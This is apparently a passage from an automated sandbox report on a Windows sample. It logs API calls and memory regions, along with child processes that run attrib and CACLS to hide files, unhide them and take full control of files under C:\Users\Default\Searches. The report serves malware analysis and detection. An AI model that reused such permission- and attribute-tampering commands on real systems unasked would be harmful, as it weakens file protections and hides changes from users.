_get_osfhandle (_FileHandle=1) returned 0x4c [0216.683] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x32, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x32, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.684] _close (_FileHandle=4) returned 0 [0216.684] FindNextFileW (in: hFindFile=0x280e50, lpFindFileData=0x1cf3d4 | out: 
lpFindFileData=0x1cf3d4) returned 0 [0216.685] GetLastError () returned 0x12 [0216.685] FindClose (in: hFindFile=0x280e50 | out: hFindFile=0x280e50) returned 1 [0216.685] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0216.685] _close (_FileHandle=3) returned 0 [0216.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.686] SetConsoleInputExeNameW () returned 0x1 [0216.686] GetConsoleOutputCP () returned 0x1b5 [0216.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.686] exit (_Code=0) Process: id = "552" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ce0" os_pid = "0x170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32290 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32291 start_va = 0x30000 end_va = 
0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32292 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32293 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32294 start_va = 0x760000 end_va = 0x766fff entry_point = 0x760000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32295 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32296 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32297 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32298 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 32299 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32300 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32301 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32302 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename 
= "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32303 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 32304 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 32305 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32306 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32307 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32308 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32309 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32310 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32311 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32312 
start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32313 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32314 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32315 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32317 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32318 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32319 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 755 os_tid = 0xbcc Process: id = "553" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16340" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib +h 
\"C:\\Users\\Default\\Searches\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32320 start_va = 0x10000 end_va = 0x13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32321 start_va = 0x20000 end_va = 0x26fff entry_point = 0x20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32322 start_va = 0x30000 end_va = 0x4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32323 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 32324 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 32325 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32326 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32327 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32328 start_va = 0x7ffdc000 end_va = 
0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 32329 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32330 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32331 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32332 start_va = 0xa0000 end_va = 0x106fff entry_point = 0xa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32333 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32334 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 32335 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32336 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32337 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32338 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32339 
start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32340 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32341 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32342 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32343 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32344 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32345 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32346 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32347 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 32348 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = 
mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32349 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 756 os_tid = 0xbb4 Process: id = "554" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib +h \"C:\\Users\\Default\\Searches\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32350 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32351 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32352 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32353 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32354 start_va = 0x350000 end_va = 0x356fff entry_point = 0x350000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 
32355 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32356 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32357 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32358 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 32359 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32360 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32361 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32362 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32363 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32364 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 32365 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32366 start_va = 0x75540000 
end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32367 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32368 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32369 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32370 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32371 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32372 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32373 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32374 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 32375 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32376 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32377 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 32378 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32379 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 757 os_tid = 0x6d8 Process: id = "555" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] 
Region: id = 32392 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32393 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32394 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32395 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32396 start_va = 0x49f60000 end_va = 0x49fabfff entry_point = 0x49f60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32397 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32398 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32399 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32400 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32401 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32402 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32403 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32404 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32405 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 32406 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 32407 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32408 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32409 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32410 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32411 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32413 start_va = 0x76d70000 
end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32414 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32415 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32416 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32418 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32419 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 32420 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 